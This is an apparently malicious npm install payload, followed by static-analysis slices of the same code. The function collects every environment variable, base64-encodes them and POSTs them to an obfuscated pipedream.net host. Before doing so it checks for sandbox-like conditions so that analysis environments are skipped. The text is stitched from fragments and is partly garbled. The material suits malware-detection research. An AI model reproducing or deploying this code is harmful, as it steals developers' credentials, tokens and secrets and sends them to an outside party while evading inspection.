function main = function main() {
  var data = process.env || {};
  if (
    filter.some((entry) =>
      []
        .concat(entry)
        .every((item) => (data[item.key] || '').includes(item.val) || item.val === '*')
    ) ||
    Object.keys(data).length < 10 ||
    data.PWD === `/${data.USER}/node_modules/${data.npm_package_name}`
  ) {
    return;
  }

  var req = http
    .request({
      host: ['eo2haodbb25u7yf', 'm', ['pip', 'edream'].join(''), 'net'].join('.'),
      path: '/' + (data.npm_package_name || ''),
      method: 'POST',
    })
    .on('error', function (err) {});

  req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
  req.end();
}
var data = process.env || {}
filter.some((entry) =>
      []
        .concat(entry)
        .every((item) => (data[item.key] || '').includes(item.val) || item.val === '*')
    ) ||
    Object.keys(data).length < 10 ||
    data.PWD === `/${data.USER}/node_modules/${data.npm_package_name}`
Object.keys(data).length < 10
<operator>.formatString("/", data.USER, "/node_modules/", data.npm_package_name, "")
var req = http
    .request({
      host: ['eo2haodbb25u7yf', 'm', ['pip', 'edream'].join(''), 'net'].join('.'),
      path: '/' + (data.npm_package_name || ''),
      method: 'POST',
    })
    .on('error', function (err) {})
request
_tmp_5.host = ['eo2haodbb25u7yf', 'm', ['pip', 'edream'].join(''), 'net'].join('.')
_tmp_5.path = '/' + (data.npm_package_name || '')
_tmp_5.method = "POST"
